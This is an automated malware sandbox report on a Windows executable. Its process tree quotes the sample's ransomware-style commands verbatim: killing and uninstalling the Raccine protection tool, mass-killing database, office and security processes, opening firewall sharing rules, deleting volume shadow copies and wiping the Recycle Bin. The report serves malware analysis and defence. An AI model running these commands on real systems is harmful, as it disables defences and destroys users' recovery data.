8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7

Resubmissions

07-06-2021 10:08

210607-9hpr7n82ba 10

03-06-2021 20:20

210603-mpsat3rm4j 10

Analysis

max time kernel
30s
max time network
31s
platform
windows10_x64
resource
win10v20210410
submitted
07-06-2021 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gVcWDWENI8.exe
Size

142KB
MD5

e1f063d63a75e0e0e864052b1a50ab06
SHA1

75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
SHA256

8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
SHA512

25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3972	taskkill.exe
2176	taskkill.exe
2144	taskkill.exe
1572	taskkill.exe
3968	taskkill.exe
3964	taskkill.exe
4076	taskkill.exe
3396	taskkill.exe
1340	taskkill.exe
1668	taskkill.exe
1892	taskkill.exe
3192	taskkill.exe
376	taskkill.exe
1820	taskkill.exe
1524	taskkill.exe
2664	taskkill.exe
3140	taskkill.exe
1680	taskkill.exe
3516	taskkill.exe
2720	taskkill.exe
3564	taskkill.exe
1520	taskkill.exe
2356	taskkill.exe
3112	taskkill.exe
3288	taskkill.exe
2080	taskkill.exe
3116	taskkill.exe
3940	taskkill.exe
3136	taskkill.exe
1468	taskkill.exe
3132	taskkill.exe
3560	taskkill.exe
2260	taskkill.exe
1320	taskkill.exe
3832	taskkill.exe
2152	taskkill.exe
1348	taskkill.exe
1144	taskkill.exe
3464	taskkill.exe
2152	taskkill.exe
1916	taskkill.exe
3520	taskkill.exe
3968	taskkill.exe
3960	taskkill.exe
4052	taskkill.exe
2076	taskkill.exe
2248	taskkill.exe
2688	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3516 reg.exe

pid	process
3516	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

gVcWDWENI8.exe

pid	process
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe
2232	gVcWDWENI8.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

gVcWDWENI8.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2232	gVcWDWENI8.exe
Token: SeDebugPrivilege	3940	taskkill.exe
Token: SeDebugPrivilege	3564	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	2076	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	3464	taskkill.exe
Token: SeDebugPrivilege	3132	taskkill.exe
Token: SeDebugPrivilege	4076	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	3560	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	3520	taskkill.exe
Token: SeDebugPrivilege	3396	taskkill.exe
Token: SeDebugPrivilege	2356	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	3960	Conhost.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	4052	Conhost.exe
Token: SeDebugPrivilege	1320	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	2720	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	3832	Conhost.exe
Token: SeDebugPrivilege	2688	taskkill.exe
Token: SeDebugPrivilege	3288	taskkill.exe
Token: SeDebugPrivilege	1892	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	3192	taskkill.exe
Token: SeDebugPrivilege	3116	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	3136	taskkill.exe
Token: SeDebugPrivilege	376	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	2248	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	2728	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

gVcWDWENI8.exe

description	pid	process	target process
PID 2232 wrote to memory of 3940	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3940	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1324	2232	gVcWDWENI8.exe	reg.exe
PID 2232 wrote to memory of 1324	2232	gVcWDWENI8.exe	reg.exe
PID 2232 wrote to memory of 3516	2232	gVcWDWENI8.exe	reg.exe
PID 2232 wrote to memory of 3516	2232	gVcWDWENI8.exe	reg.exe
PID 2232 wrote to memory of 3772	2232	gVcWDWENI8.exe	schtasks.exe
PID 2232 wrote to memory of 3772	2232	gVcWDWENI8.exe	schtasks.exe
PID 2232 wrote to memory of 3176	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3176	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3160	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3160	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 1348	2232	gVcWDWENI8.exe	netsh.exe
PID 2232 wrote to memory of 1348	2232	gVcWDWENI8.exe	netsh.exe
PID 2232 wrote to memory of 3364	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3364	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 1796	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 1796	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 2768	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 2768	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3700	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3700	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 372	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 372	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3916	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3916	2232	gVcWDWENI8.exe	sc.exe
PID 2232 wrote to memory of 3564	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3564	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1340	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1340	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2076	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2076	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2664	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2664	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3464	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3464	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3132	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3132	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 4076	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 4076	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1144	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1144	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3972	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3972	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3560	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3560	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2176	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2176	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2152	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2152	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1916	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1916	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1520	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1520	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3520	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3520	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3396	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3396	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 1872	2232	gVcWDWENI8.exe	netsh.exe
PID 2232 wrote to memory of 1872	2232	gVcWDWENI8.exe	netsh.exe
PID 2232 wrote to memory of 2356	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 2356	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3968	2232	gVcWDWENI8.exe	taskkill.exe
PID 2232 wrote to memory of 3968	2232	gVcWDWENI8.exe	taskkill.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

gVcWDWENI8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	gVcWDWENI8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	gVcWDWENI8.exe

C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe
"C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2232
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1324
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3516
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:3772
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:3176
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:3160
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:3364
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1348
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1796
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3700
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:2768
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:372
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3916
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3564
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1340
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2664
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3464
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3132
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4076
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3972
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3560
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:2152
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1520
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3520
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3396
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2356
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:3968
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:3960
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1668
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:4052
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1320
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3112
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:2732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2720
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2144
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:3140
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:3832
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3288
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1892
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3192
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3116
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1572
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3136
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:376
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1820
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2248
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2152
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4052
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1348
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3516
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3960
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3964
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2728
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:3632

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/372-128-0x0000000000000000-mapping.dmp

Download
memory/376-169-0x0000000000000000-mapping.dmp

Download
memory/1144-137-0x0000000000000000-mapping.dmp

Download
memory/1320-153-0x0000000000000000-mapping.dmp

Download
memory/1324-118-0x0000000000000000-mapping.dmp

Download
memory/1340-131-0x0000000000000000-mapping.dmp

Download
memory/1348-174-0x0000000000000000-mapping.dmp

Download
memory/1348-123-0x0000000000000000-mapping.dmp

Download
memory/1468-177-0x0000000000000000-mapping.dmp

Download
memory/1520-143-0x0000000000000000-mapping.dmp

Download
memory/1524-178-0x0000000000000000-mapping.dmp

Download
memory/1572-167-0x0000000000000000-mapping.dmp

Download
memory/1668-151-0x0000000000000000-mapping.dmp

Download
memory/1680-163-0x0000000000000000-mapping.dmp

Download
memory/1796-125-0x0000000000000000-mapping.dmp

Download
memory/1820-170-0x0000000000000000-mapping.dmp

Download
memory/1872-146-0x0000000000000000-mapping.dmp

Download
memory/1892-162-0x0000000000000000-mapping.dmp

Download
memory/1916-142-0x0000000000000000-mapping.dmp

Download
memory/2076-132-0x0000000000000000-mapping.dmp

Download
memory/2080-164-0x0000000000000000-mapping.dmp

Download
memory/2144-157-0x0000000000000000-mapping.dmp

Download
memory/2152-173-0x0000000000000000-mapping.dmp

Download
memory/2152-141-0x0000000000000000-mapping.dmp

Download
memory/2176-140-0x0000000000000000-mapping.dmp

Download
memory/2232-116-0x000000001B7A0000-0x000000001B7A2000-memory.dmp

Filesize
8KB

Download
memory/2232-114-0x0000000000B40000-0x0000000000B41000-memory.dmp

Filesize
4KB

Download
memory/2248-171-0x0000000000000000-mapping.dmp

Download
memory/2260-150-0x0000000000000000-mapping.dmp

Download
memory/2356-147-0x0000000000000000-mapping.dmp

Download
memory/2664-133-0x0000000000000000-mapping.dmp

Download
memory/2688-160-0x0000000000000000-mapping.dmp

Download
memory/2720-156-0x0000000000000000-mapping.dmp

Download
memory/2728-187-0x00000229EB860000-0x00000229EB861000-memory.dmp

Filesize
4KB

Download
memory/2728-189-0x00000229EB6D3000-0x00000229EB6D5000-memory.dmp

Filesize
8KB

Download
memory/2728-188-0x00000229EB6D0000-0x00000229EB6D2000-memory.dmp

Filesize
8KB

Download
memory/2728-201-0x00000229EB6D6000-0x00000229EB6D8000-memory.dmp

Filesize
8KB

Download
memory/2728-184-0x00000229EB690000-0x00000229EB691000-memory.dmp

Filesize
4KB

Download
memory/2728-179-0x0000000000000000-mapping.dmp

Download
memory/2732-155-0x0000000000000000-mapping.dmp

Download
memory/2768-126-0x0000000000000000-mapping.dmp

Download
memory/3112-154-0x0000000000000000-mapping.dmp

Download
memory/3116-166-0x0000000000000000-mapping.dmp

Download
memory/3132-135-0x0000000000000000-mapping.dmp

Download
memory/3136-168-0x0000000000000000-mapping.dmp

Download
memory/3140-158-0x0000000000000000-mapping.dmp

Download
memory/3160-122-0x0000000000000000-mapping.dmp

Download
memory/3176-121-0x0000000000000000-mapping.dmp

Download
memory/3192-165-0x0000000000000000-mapping.dmp

Download
memory/3288-161-0x0000000000000000-mapping.dmp

Download
memory/3364-124-0x0000000000000000-mapping.dmp

Download
memory/3396-145-0x0000000000000000-mapping.dmp

Download
memory/3464-134-0x0000000000000000-mapping.dmp

Download
memory/3516-175-0x0000000000000000-mapping.dmp

Download
memory/3516-119-0x0000000000000000-mapping.dmp

Download
memory/3520-144-0x0000000000000000-mapping.dmp

Download
memory/3560-139-0x0000000000000000-mapping.dmp

Download
memory/3564-130-0x0000000000000000-mapping.dmp

Download
memory/3632-202-0x0000000000000000-mapping.dmp

Download
memory/3700-127-0x0000000000000000-mapping.dmp

Download
memory/3772-120-0x0000000000000000-mapping.dmp

Download
memory/3832-159-0x0000000000000000-mapping.dmp

Download
memory/3916-129-0x0000000000000000-mapping.dmp

Download
memory/3940-117-0x0000000000000000-mapping.dmp

Download
